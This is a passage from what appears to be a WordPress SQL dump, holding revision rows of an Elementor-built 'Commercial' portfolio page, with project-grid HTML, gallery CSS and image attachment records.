href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:54:50','2023-05-30 08:54:50','',4681,'https://bauhaus.futuremediatrix.com/?p=4822',0,'revision','',0),(4823,2,'2023-05-30 08:54:50','2023-05-30 08:54:50','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\".architect\">\n                    Architect                </li>\n                                <li data-slug=\".design\">\n                    Design                </li>\n                                <li data-slug=\".interior\">\n                    Interior                </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson-390x473.jpg\" alt=\"Philip Johnson\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/philip-johnson/\" >\n				Philip Johnson\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Domestic-390x473.jpg\" alt=\"Domestic\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/domestic/\" >\n				Domestic\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n	    	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/buildings-390x473.jpg\" alt=\"Buildings\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://demo.ovatheme.com/retirio/category_project/architect/\" title=\"Architect\">Architect</a>	\n		<h3>\n					    	<a href=\"https://demo.ovatheme.com/retirio/project/buildings/\" >\n				Buildings\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:54:50','2023-05-30 08:54:50','',4681,'https://bauhaus.futuremediatrix.com/?p=4823',0,'revision','',0),(4824,2,'2023-05-30 08:54:51','2023-05-30 08:54:51','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:54:51','2023-05-30 08:54:51','',4681,'https://bauhaus.futuremediatrix.com/?p=4824',0,'revision','',0),(4825,2,'2023-05-30 08:55:13','2023-05-30 08:55:13','','commercial-1','','inherit','open','closed','','commercial-1','','','2023-05-30 08:55:41','2023-05-30 08:55:41','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg',0,'attachment','image/jpeg',0),(4826,2,'2023-05-30 08:55:14','2023-05-30 08:55:14','','commercial-2','','inherit','open','closed','','commercial-2','','','2023-05-30 08:55:14','2023-05-30 08:55:14','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg',0,'attachment','image/jpeg',0),(4827,2,'2023-05-30 08:55:15','2023-05-30 08:55:15','','commercial-3','','inherit','open','closed','','commercial-3','','','2023-05-30 08:55:15','2023-05-30 08:55:15','',0,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg',0,'attachment','image/jpeg',0),(4828,2,'2023-05-30 08:55:36','2023-05-30 08:55:36','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:36','2023-05-30 08:55:36','',4681,'https://bauhaus.futuremediatrix.com/?p=4828',0,'revision','',0),(4829,2,'2023-05-30 08:55:36','2023-05-30 08:55:36','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:36','2023-05-30 08:55:36','',4681,'https://bauhaus.futuremediatrix.com/?p=4829',0,'revision','',0),(4830,2,'2023-05-30 08:55:36','2023-05-30 08:55:36','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-05-30 08:55:36','2023-05-30 08:55:36','',4681,'https://bauhaus.futuremediatrix.com/?p=4830',0,'revision','',0),(4831,2,'2023-05-30 08:55:45','2023-05-30 08:55:45','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		